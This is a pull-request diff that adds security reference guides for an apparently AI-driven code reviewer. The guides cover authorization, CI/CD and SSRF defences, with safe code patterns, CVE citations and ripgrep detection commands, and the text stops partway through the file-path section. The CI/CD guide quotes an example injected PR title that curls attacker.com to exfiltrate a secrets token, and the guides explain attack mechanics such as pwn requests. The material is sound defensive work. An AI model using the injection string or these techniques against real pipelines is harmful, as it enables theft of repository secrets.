### PR TITLE
feat(reviewer-system): add CVE-backed security reference files

### DIFF
--- a/agents/reviewer-system.md
+++ b/agents/reviewer-system.md
@@ -50,6 +50,12 @@ Based on the review request, load the appropriate reference(s):
 | Docs Validator | [references/docs-validator.md](reviewer-system/references/docs-validator.md) | README, CLAUDE.md, CI/CD, build system, project metadata |
 
 **Security sub-references** (loaded when security domain is active):
+- [references/security-finding-template.md](reviewer-system/references/security-finding-template.md) — Structured output format for security findings
+- [references/security-authz.md](reviewer-system/references/security-authz.md) — Authorization: IDOR, mass assignment, JWT, session, RBAC
+- [references/security-injection.md](reviewer-system/references/security-injection.md) — Injection: command, deserialization, SSTI, eval, prototype pollution
+- [references/security-data-exfil.md](reviewer-system/references/security-data-exfil.md) — Data exfiltration: SSRF, path traversal, SQL injection, XXE, response leakage
+- [references/security-ci-cd.md](reviewer-system/references/security-ci-cd.md) — CI/CD: GitHub Actions, expression injection, supply chain, credentials
+- [references/security-pii.md](reviewer-system/references/security-pii.md) — PII: logs, fixtures, URLs, error responses, serialized output
 - [references/stride-threat-model.md](reviewer-system/references/stride-threat-model.md) — STRIDE threat modeling methodology
 - [references/compliance-checklists.md](reviewer-system/references/compliance-checklists.md) — GDPR, SOC2, PCI-DSS, HIPAA code-level checks
 - [references/sovereign-cloud-data-residency.md](reviewer-system/references/sovereign-cloud-data-residency.md) — German/EU data residency requirements
@@ -170,6 +176,12 @@ Each finding must follow this structure:
 | Signal | Load These Files | Why |
 |---|---|---|
 | Security | `security.md` | OWASP, auth, injection, XSS, CSRF, secrets, vulnerabilities |
+| Security finding output format needed | `security-finding-template.md` | Structured finding format with exploitation path, verification, and correct pattern |
+| Auth, permission, access control, RBAC, IDOR, JWT, session | `security-authz.md` | Authorization: scoped queries, fail-closed checks, mass assignment, JWT pinning, Server Actions |
+| eval, exec, subprocess, pickle, template, deserialize, prototype | `security-injection.md` | Injection: command, deserialization, SSTI, eval/Function, prototype pollution |
+| URL fetch, file path, SQL, XML, response, serializer, debug | `security-data-exfil.md` | Data exfiltration: SSRF, path traversal, SQL injection, XXE, response leakage, debug modes |
+| .github/workflows, actions, CI, pipeline, runner | `security-ci-cd.md` | CI/CD: pwn requests, expression injection, supply chain, credentials, reusable workflows |
+| email, phone, SSN, PII, personal data, logging user | `security-pii.md` | PII: test fixtures, logs, URLs, error responses, serialized output, git history |
 | Concurrency | `concurrency.md` | Race conditions, goroutine leaks, deadlocks, mutex, channels, thread safety |
 | Silent Failures | `silent-failures.md` | Swallowed errors, empty catch blocks, ignored error returns, fallback behavior |
 | Error Messages | `error-messages.md` | Error text quality, actionable messages, context, formatting, audience separation |

--- a/agents/reviewer-system/references/security-authz.md
+++ b/agents/reviewer-system/references/security-authz.md
@@ -1,0 +1,409 @@
+# Authorization Security Patterns
+
+Load when reviewing code that handles permissions, access control, RBAC, IDOR, JWT validation, session management, or any route/endpoint that serves protected resources.
+
+Authorization answers one question: is this principal permitted to perform this action on this resource? The patterns below show how to answer it correctly across frameworks.
+
+---
+
+## Scope Querysets to the Authenticated User
+
+Every database query for a user-owned resource must filter by the authenticated principal. The query itself is the authorization boundary — not the route decorator, not the frontend, not the URL structure.
+
+### Correct Pattern
+
+**Django/DRF:**
+```python
+class OrderViewSet(ModelViewSet):
+    serializer_class = OrderSerializer
+    permission_classes = [IsAuthenticated]
+
+    def get_queryset(self):
+        # Scope every query to the requesting user's organization
+        return Order.objects.filter(organization=self.request.user.organization)
+```
+
+**Express/Prisma:**
+```ts
+router.get('/orders/:id', requireAuth, async (req, res) => {
+  // Include ownership filter in the WHERE clause
+  const order = await db.order.findFirst({
+    where: { id: req.params.id, userId: req.user.id },
+  });
+  if (!order) return res.sendStatus(404);
+  res.json(order);
+});
+```
+
+**FastAPI:**
+```python
+@router.get("/orders/{order_id}")
+async def get_order(order_id: int, user: User = Depends(get_current_user)):
+    order = await Order.filter(id=order_id, owner=user).first()
+    if not order:
+        raise HTTPException(status_code=404)
+    return order
+```
+
+**Go:**
+```go
+func (h *Handler) GetOrder(w http.ResponseWriter, r *http.Request) {
+    userID := auth.UserIDFromContext(r.Context())
+    orderID := chi.URLParam(r, "orderID")
+    // Scope the query to the authenticated user
+    order, err := h.store.GetOrderForUser(r.Context(), orderID, userID)
+    if err != nil {
+        http.Error(w, "not found", http.StatusNotFound)
+        return
+    }
+    json.NewEncoder(w).Encode(order)
+}
+```
+
+### Why This Matters
+
+Unscoped queries are the most common authorization vulnerability in web applications. When `Order.objects.get(id=order_id)` runs without a user filter, any authenticated user can read any order by guessing or enumerating IDs. This is IDOR — Insecure Direct Object Reference.
+
+Real incidents: Shopify HackerOne #2207248 (BillingInvoice lookup by global ID without shop scoping), SingleStore HackerOne #3219944 (cross-tenant data access via unscoped queries).
+
+**CVEs:** OWASP A01:2021 Broken Access Control is the #1 web vulnerability category.
+
+### Detection
+
+```bash
+# Django: ModelViewSet without get_queryset override (likely uses unscoped queryset)
+rg -n 'class \w+ViewSet.*ModelViewSet' --type py -l | xargs rg -L 'def get_queryset'
+
+# Django: Direct objects.get with id from request
+rg -n 'objects\.(get|filter)\(id=.*kwargs\[|id=.*request\.(GET|POST|data)' --type py
+
+# Express/Prisma: findUnique without ownership filter
+rg -n 'findUnique\(\{.*where:.*req\.params' --type ts
+
+# Go: database queries using only URL parameter without user context
+rg -n 'GetOrder|FindOrder|FetchOrder' --type go -l | xargs rg -n 'func.*http\.Request'
+```
+
+---
+
+## Close Permission Functions with an Explicit Default Deny
+
+Every permission-checking function must end with `return False` (or equivalent). When a role string, permission name, or scope value is unrecognized, the function must deny access. There is no safe default other than denial.
+
+### Correct Pattern
+
+**Python:**
+```python
+def can_edit(user, resource):
+    if user.role == "admin":
+        return True
+    if user.role == "editor" and resource.owner_id == user.id:
+        return True
+    # Explicit deny for all unrecognized roles
+    return False
+```
+
+**TypeScript:**
+```ts
+function canEdit(user: User, resource: Resource): boolean {
+  if (user.role === 'admin') return true;
+  if (user.role === 'editor' && resource.ownerId === user.id) return true;
+  // Explicit deny — never fall through
+  return false;
+}
+```
+
+**Go:**
+```go
+func canEdit(user *User, resource *Resource) bool {
+    switch user.Role {
+    case "admin":
+        return true
+    case "editor":
+        return resource.OwnerID == user.ID
+    default:
+        // Explicit deny for unknown roles
+        return false
+    }
+}
+```
+
+### Why This Matters
+
+Missing final `return False` causes the function to return `None` (Python) or `undefined` (JS), which are falsy but can leak through callers that check for truthiness differently. A role string not covered by any branch silently falls through. Apollo Router CVE-2025-64347 demonstrated this: a directive renamed via `@link` was not recognized by the authorization check, so the default path allowed the request.
+
+### Detection
+
+```bash
+# Python: permission functions without explicit return False at end
+rg -n 'def (can_|has_|check_|is_allowed|is_authorized)' --type py
+
+# TypeScript: permission functions — check each for exhaustive return
+rg -n 'function (can|has|check|isAllowed|isAuthorized)' --type ts
+```
+
+---
+
+## Restrict Writable Fields with an Explicit Allowlist
+
+Serializers and update handlers must declare exactly which fields a client can write. Spreading request body directly into a database create or update operation allows mass assignment — an attacker adds `{"role": "admin"}` or `{"is_staff": true}` to the payload and elevates their own privileges.
+
+### Correct Pattern
+
+**Django/DRF:**
+```python
+class UserProfileSerializer(ModelSerializer):
+    class Meta:
+        model = User
+        # Explicit field list — only these are writable
+        fields = ['display_name', 'avatar_url', 'timezone']
+```
+
+**Express/Zod:**
+```ts
+const ProfileUpdate = z.object({
+  displayName: z.string().max(80).optional(),
+  avatarUrl: z.string().url().optional(),
+  timezone: z.string().optional(),
+});
+
+router.patch('/me', requireAuth, async (req, res) => {
+  // Parse strips unknown fields — role, is_staff, org_id cannot pass
+  const data = ProfileUpdate.parse(req.body);
+  const user = await db.user.update({ where: { id: req.user.id }, data });
+  res.json(user);
+});
+```
+
+**FastAPI/Pydantic:**
+```python
+class ProfileUpdate(BaseModel):
+    display_name: str | None = None
+    avatar_url: HttpUrl | None = None
+    timezone: str | None = None
+
+    class Config:
+        extra = "forbid"  # Reject unknown fields entirely
+```
+
+### Why This Matters
+
+Mass assignment is one of the most common privilege escalation vectors. DRF's `fields = '__all__'` on a write endpoint exposes every model field including `is_staff`, `is_superuser`, and `organization_id`. Spreading `req.body` into Prisma's `data` parameter does the same.
+
+**CVEs:** OWASP A01:2021, Ruby on Rails CVE-2012-2661 (mass assignment), GitHub's 2012 mass-assignment incident on public keys.
+
+### Detection
+
+```bash
+# DRF: serializers with fields = '__all__' — check if used on write endpoints
+rg -n "fields = '__all__'" --type py
+
+# Express: spreading req.body into database operations
+rg -n 'data: req\.body|\.create\(req\.body\)|\.update\(.*req\.body' --type ts
+
+# FastAPI/Pydantic: models allowing extra fields
+rg -n "extra = .allow." --type py
+```
+
+---
+
+## Apply Authorization Guards at the Router Level
+
+Mount permission middleware on the router or controller, not individually on each handler. When authorization is applied per-handler, a new endpoint added without the decorator is silently unprotected.
+
+### Correct Pattern
+
+**FastAPI:**
+```python
+# Authorization applied at the router level — every endpoint inherits it
+admin_router = APIRouter(
+    prefix="/admin",
+    dependencies=[Depends(require_admin)]
+)
+
+@admin_router.get("/users")
+async def list_users():
+    return await db.users.find_all()
+```
+
+**Express:**
+```ts
+// Admin middleware applied to the entire router
+app.use('/admin', requireAuth, requireAdmin, adminRouter);
+```
+
+**NestJS:**
+```ts
+@UseGuards(AuthGuard, AdminGuard)  // Applied at the controller level
+@Controller('admin')
+export class AdminController {
+  @Get('users')
+  findAll() {
+    return this.userService.findAll();
+  }
+}
+```
+
+**Django:**
+```python
+# Django 5.1+ LoginRequiredMiddleware covers all views by default
+# Pair with per-view permission_classes for object-level access
+MIDDLEWARE = [
+    ...
+    'django.contrib.auth.middleware.LoginRequiredMiddleware',
+]
+```
+
+### Why This Matters
+
+When guards are declared but not applied, the code has an authorization definition with no enforcement. MLflow ajax-api endpoints shipped without the shared `Depends()` — the guard existed but was never attached to the router. Every new route added to an unguarded router is a potential privilege escalation.
+
+### Detection
+
+```bash
+# FastAPI: routers without dependencies (potential missing auth)
+rg -n 'APIRouter\(' --type py | rg -v 'dependencies='
+
+# Express: route mounting without auth middleware
+rg -n "app\.use\('/(admin|api|internal)" --type ts
+
+# NestJS: controllers without UseGuards
+rg -n '@Controller' --type ts -l | xargs rg -L '@UseGuards'
+```
+
+---
+
+## Validate JWT Claims with Algorithm Pinning and Scope Verification
+
+Decode JWTs with signature verification enabled and the algorithm explicitly pinned. After verification, confirm that the token's claims (org, tenant, scope) match the resource being accessed.
+
+### Correct Pattern
+
+**Python (PyJWT):**
+```python
+# Pin the algorithm and verify signature
+payload = jwt.decode(token, public_key, algorithms=["RS256"])
+
+# Verify the token's org claim matches the requested resource
+if payload["org_id"] != request.org.id:
+    raise PermissionDenied("token org mismatch")
+
+if "org:admin" not in payload.get("scope", []):
+    raise PermissionDenied("insufficient scope")
+```
+
+**TypeScript (jsonwebtoken):**
+```ts
+// Pin algorithm — prevents RS256/HS256 confusion attacks
+const claims = jwt.verify(token, publicKey, { algorithms: ['RS256'] });
+
+// Verify org-level claims match the target resource
+if (claims.orgId !== req.org.id) {
+  throw new ForbiddenError('token org mismatch');
+}
+```
+
+### Why This Matters
+
+Unverified JWT claims are attacker-controlled strings. `jwt.decode()` without verification returns whatever the client sent — including `{"role": "admin"}`. Algorithm confusion attacks (RS256 key used as HS256 secret) let attackers forge tokens with a public key.
+
+**CVEs:** jsonwebtoken CVE-2022-23540 (default algorithm bypass), CVE-2022-23541 (RS-to-HS confusion), PyJWT CVE-2022-29217 (algorithm confusion), Java ECDSA CVE-2022-21449 ("psychic signatures" — any signature accepted).
+
+### Detection
+
+```bash
+# Python: JWT decode without signature verification
+rg -n 'jwt\.decode.*verify_signature.*False|jwt\.decode\(.*options=' --type py
+
+# Python: JWT decode without algorithm pinning
+rg -n 'jwt\.decode' --type py | rg -v 'algorithms='
+
+# TypeScript: jwt.decode (returns claims without verification)
+rg -n 'jwt\.decode\(' --type ts
+
+# TypeScript: jwt.verify without algorithms pin
+rg -n 'jwt\.verify' --type ts | rg -v 'algorithms'
+```
+
+---
+
+## Enforce Authorization Inside Server Actions
+
+Next.js Server Actions are directly invokable HTTP endpoints. Page-level authentication checks do not protect the action — every Server Action must verify the caller's identity and permissions independently.
+
+### Correct Pattern
+
+```ts
+'use server';
+
+export async function deleteUser(userId: string) {
+  // Re-authenticate inside the action — page-level checks do not apply here
+  const session = await auth();
+  if (!session?.user?.isAdmin) {
+    throw new Error('unauthorized');
+  }
+  await db.user.delete({ where: { id: userId } });
+}
+```
+
+### Why This Matters
+
+Server Actions are HTTP POST endpoints. A page component that checks `session?.user?.isAdmin` before rendering a form does not protect the action the form calls. The action is invokable by anyone who can construct the POST request, bypassing the page entirely.
+
+**CVEs:** CVE-2025-55182 (React2Shell) demonstrated that Next.js Server Actions re-expose handlers regardless of page-level guards. The Next.js data-security documentation explicitly requires re-authentication in every action.
+
+### Detection
+
+```bash
+# Find Server Actions without auth checks
+rg -rn "'use server'" --type ts -l | xargs rg -L 'auth\(\)|getSession\(\)|getServerSession'
+
+# Find Server Actions that perform mutations
+rg -A5 "'use server'" --type ts | rg 'delete|update|create|insert'
+```
+
+---
+
+## Verify Session Integrity Before Trusting Identity Claims
+
+Session-derived identity claims (user ID, role, tenant) must come from a verified session store, not from client-modifiable cookies or unsigned tokens. After password reset, login-as, or impersonation flows, re-validate that the session maps to the intended principal.
+
+### Correct Pattern
+
+**Django:**
+```python
+# Django's session framework stores session data server-side by default.
+# The session cookie contains only the session ID, not the claims.
+# Verify the session is valid and maps to the expected user.
+user = request.user  # Resolved from session middleware
+if not user.is_authenticated:
+    return HttpResponseForbidden()
+```
+
+**Express:**
+```ts
+// Use server-side session store — not client-side JWT for session state
+app.use(session({
+  store: new RedisStore({ client: redisClient }),
+  secret: process.env.SESSION_SECRET,
+  resave: false,
+  saveUninitialized: false,
+  cookie: { secure: true, httpOnly: true, sameSite: 'strict' },
+}));
+```
+
+### Why This Matters
+
+Impersonation endpoints ("log in as user" / support tools) without staff-role gates, session binding, or audit logging allow horizontal and vertical privilege escalation. Password-reset identity claims that feed role or tenant checks without re-verification let attackers hijack sessions.
+
+**CVEs:** ruby-saml CVE-2024-45409 (SAML response signature bypass enabling impersonation).
+
+### Detection
+
+```bash
+# Find impersonation or login-as endpoints
+rg -n 'login.as|impersonate|switch.user|view.as|act.as' --type py --type ts -i
+
+# Find session configuration without secure flags
+rg -n 'cookie:.*secure.*false|httpOnly.*false|sameSite.*none' --type ts
+```

--- a/agents/reviewer-system/references/security-ci-cd.md
+++ b/agents/reviewer-system/references/security-ci-cd.md
@@ -1,0 +1,335 @@
+# CI/CD Security Patterns
+
+Load when reviewing GitHub Actions workflows, CI pipeline configurations, action definitions, or scripts executed during CI builds.
+
+CI/CD pipelines run with elevated privileges: write access to repositories, secrets for deployment, OIDC tokens for cloud roles, and package publishing credentials. The correct approach is to separate privileged and unprivileged execution, pin dependencies to immutable references, and treat all PR-controlled content as untrusted input.
+
+---
+
+## Run Untrusted Code in Unprivileged Workflows
+
+Use the `pull_request` trigger for building and testing fork contributions. This trigger runs with read-only permissions and no access to repository secrets. Use `pull_request_target` only when the workflow needs repository write access and does not execute PR-controlled code.
+
+### Correct Pattern
+
+```yaml
+# Unprivileged workflow — safe for fork PRs
+on: pull_request
+permissions:
+  contents: read
+jobs:
+  test:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          persist-credentials: false  # Do not persist GITHUB_TOKEN in .git/config
+      - run: npm ci
+      - run: npm test
+```
+
+When the workflow needs to report results (comment on PR, update status), use a separate `workflow_run` job that treats artifacts from the untrusted run as data, not code:
+
+```yaml
+# Privileged reporting workflow — triggered after the untrusted build completes
+on:
+  workflow_run:
+    workflows: ["Test"]
+    types: [completed]
+permissions:
+  pull-requests: write
+jobs:
+  report:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/download-artifact@v4
+        with:
+          run-id: ${{ github.event.workflow_run.id }}
+      # Parse artifact contents as data — never execute them
+      - run: cat results.json | jq '.summary' > comment.md
+```
+
+### Why This Matters
+
+`pull_request_target` runs in the context of the base repository with full secrets and write permissions. When this workflow checks out and executes fork code (`ref: ${{ github.event.pull_request.head.sha }}`), the fork controls package scripts, test code, Makefiles, and local actions while the job has trusted-repository credentials. This is the "pwn request" — the attacker gets code execution with the victim's secrets.
+
+**CVEs:** GitHub Security Lab documented the pwn-request pattern across hundreds of repositories. The pattern applies to any trigger that combines privileged context with PR-controlled code execution.
+
+### Detection
+
+```bash
+# Find pull_request_target workflows
+rg -n 'pull_request_target' .github/workflows/
+
+# Find checkout of PR head in privileged context
+rg -n 'github\.event\.pull_request\.head\.sha|github\.head_ref' .github/workflows/
+
+# Find workflows that run npm/pip/make after checking out PR code
+rg -B5 -A5 'npm install|npm test|pip install|make |pytest|cargo test|go test' .github/workflows/
+```
+
+---
+
+## Pass Untrusted Values Through Environment Variables
+
+GitHub Actions expressions (`${{ }}`) in `run:` blocks are string-interpolated before the shell executes. When the expression contains attacker-controlled content (PR title, issue body, comment text, branch name), the attacker can inject shell commands. Pass these values through environment variables instead.
+
+### Correct Pattern
+
+```yaml
+on: pull_request
+jobs:
+  lint:
+    runs-on: ubuntu-latest
+    steps:
+      # Untrusted value goes into an environment variable
+      - env:
+          PR_TITLE: ${{ github.event.pull_request.title }}
+        run: printf '%s\n' "$PR_TITLE"
+```
+
+For `actions/github-script`, pass untrusted values through `env:` and read with `process.env`:
+
+```yaml
+- uses: actions/github-script@v7
+  env:
+    ISSUE_TITLE: ${{ github.event.issue.title }}
+  with:
+    script: |
+      const title = process.env.ISSUE_TITLE;
+      await github.rest.issues.createComment({
+        owner: context.repo.owner,
+        repo: context.repo.repo,
+        issue_number: context.issue.number,
+        body: `Triaged: ${title}`,
+      });
+```
+
+Also watch for injection into `$GITHUB_OUTPUT`, `$GITHUB_ENV`, `$GITHUB_PATH`, and `$GITHUB_STEP_SUMMARY` — these are parsed by GitHub and consumed by subsequent steps:
+
+```yaml
+# Safe: delimiter-based output
+- run: |
+    delimiter="$(openssl rand -hex 16)"
+    echo "title<<${delimiter}" >> "$GITHUB_OUTPUT"
+    echo "$PR_TITLE" >> "$GITHUB_OUTPUT"
+    echo "${delimiter}" >> "$GITHUB_OUTPUT"
+  env:
+    PR_TITLE: ${{ github.event.pull_request.title }}
+```
+
+### Why This Matters
+
+Expression injection is shell injection via CI. A PR titled `"; curl attacker.com/steal?t=$SECRETS_TOKEN #` breaks out of the echo command and exfiltrates secrets. The same applies to issue titles, comment bodies, review bodies, discussion titles, branch names, changed filenames, commit messages, and labels. `actions/github-script` evaluates its `script:` body as JavaScript — interpolating untrusted values directly into the script source is equivalent to `eval()`.
+
+**CVEs:** CVE-2026-27701 (LiveCode — `actions/github-script` expression injection via PR title), Sentry getsentry commit `0898b3d8` (expression injection into `$GITHUB_OUTPUT`), Sentry commit `e93ee1ce` (composite action input interpolated into shell).
+
+### Detection
+
+```bash
+# Find direct expression interpolation in run blocks
+rg -n '\$\{\{.*github\.event\.(pull_request\.(title|body)|issue\.(title|body)|comment\.body|review\.body|discussion\.(title|body))' .github/workflows/
+
+# Find expression interpolation in github-script blocks
+rg -n '\$\{\{' .github/workflows/ | rg 'script:'
+
+# Find branch name and commit message interpolation
+rg -n '\$\{\{.*github\.(head_ref|event\.commits)' .github/workflows/
+
+# Find writes to GITHUB_ENV and GITHUB_OUTPUT with expressions
+rg -n 'GITHUB_ENV|GITHUB_OUTPUT|GITHUB_PATH' .github/workflows/ | rg '\$\{\{'
+```
+
+---
+
+## Gate Comment-Triggered Commands with Author Association
+
+Workflows triggered by `issue_comment` or discussion events must verify the commenter's association with the repository before executing commands. Check `github.event.comment.author_association` against `MEMBER`, `OWNER`, or `COLLABORATOR`. Without this gate, any user who can comment on an issue can trigger privileged CI actions.
+
+### Correct Pattern
+
+```yaml
+on: issue_comment
+jobs:
+  deploy-preview:
+    if: >
+      contains(github.event.comment.body, '/deploy') &&
+      contains(fromJSON('["MEMBER","OWNER","COLLABORATOR"]'),
+               github.event.comment.author_association)
+    permissions:
+      contents: read
+      pull-requests: write
+    runs-on: ubuntu-latest
+    steps:
+      - env:
+          COMMENT_BODY: ${{ github.event.comment.body }}
+        run: ./ci/deploy-preview.sh "$COMMENT_BODY"
+```
+
+For approval-gated workflows (`/ok-to-test`), pin the checkout to the SHA the maintainer approved, not the current head:
+
+```yaml
+# Capture the approved SHA at approval time and use it for checkout
+- uses: actions/checkout@v4
+  with:
+    ref: ${{ steps.get-approved-sha.outputs.sha }}  # SHA from approval event
+    persist-credentials: false
+```
+
+### Why This Matters
+
+Comment-triggered commands without authorization let any GitHub user execute deployment scripts, trigger builds, or invoke tools with repository secrets. The TOCTOU (time-of-check-time-of-use) variant is subtler: a maintainer comments `/ok-to-test`, the workflow resolves `pull_request.head.sha` at execution time, the attacker pushes a new commit between approval and checkout, and the privileged job runs unreviewed code.
+
+**CVEs:** CVE-2025-53104 (gluestack-ui — discussion-title shell injection via comment-triggered workflow).
+
+### Detection
+
+```bash
+# Find issue_comment triggered workflows
+rg -n 'issue_comment|discussion' .github/workflows/
+
+# Check for missing author_association check
+rg -l 'issue_comment' .github/workflows/ | xargs rg -L 'author_association'
+
+# Find slash command patterns without auth gates
+rg -n "contains.*'/deploy\|contains.*'/test\|contains.*'/ok-to" .github/workflows/
+```
+
+---
+
+## Pin Third-Party Actions to Full Commit SHAs
+
+Reference third-party actions by their 40-character commit SHA, not by tag or branch name. Tags are mutable pointers — the action's maintainer (or an attacker who compromises their account) can rewrite a tag to point at malicious code. Comment the tag version for human readability.
+
+### Correct Pattern
+
+```yaml
+steps:
+  # Pinned to SHA — immutable reference. Tag noted in comment for humans.
+  - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683  # v4.2.2
+  - uses: actions/setup-node@39370e3970a6d050c480ffad4ff0ed4d3fdee5af  # v4.1.0
+
+  # Third-party action — SHA pin is critical
+  - uses: tj-actions/changed-files@a4ca7c0a052d49bbf8e69ddca9a3f53dac15c95e  # v45.0.10
+```
+
+Use Dependabot to keep SHA pins current:
+
+```yaml
+# .github/dependabot.yml
+version: 2
+updates:
+  - package-ecosystem: "github-actions"
+    directory: "/"
+    schedule:
+      interval: "weekly"
+```
+
+### Why This Matters
+
+Tag rewrites have already been weaponized at scale. In March 2025, an attacker compromised `tj-actions/changed-files` and rewrote tags v1 through v45 to point at a malicious commit that dumped runner process memory (including secrets) to workflow logs. Around 23,000 repositories executed the compromised code. The attack vector was a compromised upstream dependency (`reviewdog/action-setup`), demonstrating how a single popular action cascading through supply chains.
+
+**CVEs:** CVE-2025-30066 (tj-actions/changed-files — tag rewrite, secret exfiltration from 23,000+ repos), CVE-2025-30154 (reviewdog/action-setup — upstream supply chain compromise that enabled the tj-actions attack).
+
+First-party actions (`actions/*`, `github/*`) on tags are an acceptable exception — these are governed by GitHub's organization security. Actions vendored into the same repository under the same branch protection policy are also acceptable.
+
+### Detection
+
+```bash
+# Find all third-party action references (excluding actions/* and github/*)
+rg -n 'uses:' .github/workflows/ | rg -v 'actions/|github/' | rg -v '@[0-9a-f]{40}'
+
+# Find mutable refs (tags, branches) on third-party actions
+rg -n 'uses:' .github/workflows/ | rg -v 'actions/|github/' | rg '@v[0-9]|@main|@master|@latest'
+
+# List all action references for review
+rg -n 'uses:' .github/workflows/
+```
+
+---
+
+## Restrict Artifact Upload Paths and Disable Credential Persistence
+
+Upload only the specific build output directory, never the workspace root. Disable credential persistence on `actions/checkout` so the `GITHUB_TOKEN` is not stored in `.git/config` where an artifact upload or untrusted code could read it.
+
+### Correct Pattern
+
+```yaml
+steps:
+  - uses: actions/checkout@v4
+    with:
+      persist-credentials: false  # GITHUB_TOKEN not written to .git/config
+
+  - run: ./build.sh
+
+  - uses: actions/upload-artifact@v4
+    with:
+      name: build-output
+      path: dist/  # Specific output directory — not . or ./
+```
+
+### Why This Matters
+
+`actions/checkout` persists the `GITHUB_TOKEN` in `.git/config` by default. When `actions/upload-artifact` uploads the workspace root (`.` or `./`), the `.git/` directory is included, and the persisted token becomes world-readable in the artifact download. Public repository artifacts are downloadable by anyone. This is the ArtiPACKED attack documented by Palo Alto Unit 42 in August 2024. The same risk applies to uploading `~/.docker/config.json`, `~/.npmrc`, or `~/.gitconfig` after credential helpers have written to them.
+
+### Detection
+
+```bash
+# Find artifact uploads of workspace root
+rg -n 'upload-artifact' .github/workflows/ -A5 | rg "path: '\.'|path: \./?$|path: \./?"
+
+# Find checkout without persist-credentials: false
+rg -n 'actions/checkout' .github/workflows/ -A3 | rg -v 'persist-credentials: false'
+
+# Find broad artifact paths
+rg -n 'upload-artifact' .github/workflows/ -A5 | rg 'path:'
+```
+
+---
+
+## Declare Secrets Explicitly in Reusable Workflows
+
+Reusable workflows (`on: workflow_call`) must declare every secret they consume under their own `secrets:` map. When a callee uses `secrets.DEPLOY_KEY` without declaring it, the workflow only functions through `secrets: inherit` — the secret surface is invisible to anyone reading the callee file, and callers that pass secrets explicitly silently break.
+
+### Correct Pattern
+
+```yaml
+on:
+  workflow_call:
+    inputs:
+      target:
+        type: string
+        required: true
+    secrets:
+      DEPLOY_KEY:
+        required: true  # Explicit declaration — visible to reviewers
+
+permissions:
+  contents: read  # Pin permissions so callee does not inherit caller's broad scope
+
+jobs:
+  deploy:
+    runs-on: ubuntu-latest
+    steps:
+      - run: ./bin/deploy "$TARGET"
+        env:
+          TARGET: ${{ inputs.target }}
+          DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}
+```
+
+### Why This Matters
+
+Undeclared secrets mask the security surface of reusable workflows. A reviewer reading the callee cannot see which secrets it consumes. When the callee also omits a `permissions:` block, it inherits whatever the caller granted, routinely over-scoping the job. Sentry fixed this pattern in getsentry #19582 and #19634.
+
+### Detection
+
+```bash
+# Find reusable workflows
+rg -l 'workflow_call' .github/workflows/
+
+# Find secret usage in reusable workflows without declaration
+rg -l 'workflow_call' .github/workflows/ | xargs rg 'secrets\.' | rg -v 'secrets:\|GITHUB_TOKEN'
+
+# Find reusable workflows without permissions block
+rg -l 'workflow_call' .github/workflows/ | xargs rg -L 'permissions:'
+```

--- a/agents/reviewer-system/references/security-data-exfil.md
+++ b/agents/reviewer-system/references/security-data-exfil.md
@@ -1,0 +1,433 @@
+# Data Exfiltration Patterns
+
+Load when reviewing code that handles URL fetching, file paths, raw SQL queries, XML parsing, response serialization, debug modes, or error handling that may expose internal data.
+
+Data exfiltration occurs when data crosses a trust boundary it should not: internal services exposed via SSRF, filesystem contents leaked via path traversal, database contents dumped via SQL injection, or internal fields shipped to clients via over-broad serialization. The correct approach is to validate inputs at the boundary and expose only the fields the caller needs.
+
+---
+
+## Validate URLs at the IP Layer Before Fetching
+
+When the application fetches a URL provided by the user (webhooks, image proxies, import-from-URL flows), validate the resolved IP address against a blocklist of internal ranges. String-based URL checks fail because DNS rebinding, IP encoding tricks, and redirects all bypass hostname validation.
+
+### Correct Pattern
+
+**Python:**
+```python
+import ipaddress
+import socket
+from urllib.parse import urlparse
+
+BLOCKED_RANGES = [
+    ipaddress.ip_network('127.0.0.0/8'),
+    ipaddress.ip_network('10.0.0.0/8'),
+    ipaddress.ip_network('172.16.0.0/12'),
+    ipaddress.ip_network('192.168.0.0/16'),
+    ipaddress.ip_network('169.254.0.0/16'),  # Link-local, includes cloud metadata
+]
+
+def safe_fetch(user_url: str) -> bytes:
+    parsed = urlparse(user_url)
+    if parsed.scheme not in ('http', 'https'):
+        raise ValueError('scheme not allowed')
+
+    # Resolve hostname to IP and check against blocklist
+    addr = socket.getaddrinfo(parsed.hostname, parsed.port or 443)[0][4][0]
+    ip = ipaddress.ip_address(addr)
+    if any(ip in net for net in BLOCKED_RANGES):
+        raise ValueError('internal IP not allowed')
+
+    # Disable redirect following — redirects can point to internal IPs
+    resp = requests.get(user_url, allow_redirects=False, timeout=10)
+    return resp.content
+```
+
+**TypeScript:**
+```ts
+import { lookup } from 'dns/promises';
+import ipaddr from 'ipaddr.js';
+
+const BLOCKED_RANGES = ['private', 'linkLocal', 'loopback', 'uniqueLocal', 'unspecified'];
+
+async function safeFetch(userUrl: string): Promise<Response> {
+  const parsed = new URL(userUrl);
+  if (!['http:', 'https:'].includes(parsed.protocol)) {
+    throw new Error('scheme not allowed');
+  }
+
+  // Resolve and validate IP before connecting
+  const { address } = await lookup(parsed.hostname);
+  const ip = ipaddr.parse(address);
+  if (BLOCKED_RANGES.includes(ip.range())) {
+    throw new Error('internal IP not allowed');
+  }
+
+  return fetch(parsed.href, { redirect: 'manual' });
+}
+```
+
+### Why This Matters
+
+SSRF lets an attacker use the server as a proxy to reach internal services, cloud metadata endpoints, and other resources invisible from the internet. The most damaging target is the cloud metadata service at `169.254.169.254`, which returns IAM credentials, instance identity, and user data. String-based URL blocklists fail because DNS can return any IP for an attacker-owned domain, and redirects move the request mid-flight.
+
+**CVEs:** Capital One 2019 (SSRF to IMDSv1 stole IAM credentials, 30GB exfiltrated from S3), CVE-2021-26855 (Exchange ProxyLogon — unauthenticated SSRF with domain-computer credentials), CVE-2024-34351 (Next.js Server Actions SSRF — Host header manipulation redirected internal fetches), CVE-2020-28168 (axios redirect bypass — proxy validation applied only to first request), CVE-2024-21893 (Ivanti Connect Secure SAML SSRF chained with auth bypass).
+
+### Detection
+
+```bash
+# Python: requests/urllib with user-controlled URL
+rg -n 'requests\.(get|post|put)\(|urlopen\(|urllib\.request' --type py
+
+# TypeScript: fetch/axios/got with user URL variable
+rg -n 'fetch\(|axios\.(get|post)\(|got\(' --type ts --type js
+
+# Look for webhook/callback URL handling
+rg -n 'callback_url|webhook_url|target_url|redirect_url' --type py --type ts
+
+# Check for missing IP validation
+rg -n 'allow_redirects=True' --type py
+```
+
+---
+
+## Contain File Paths with Realpath Validation
+
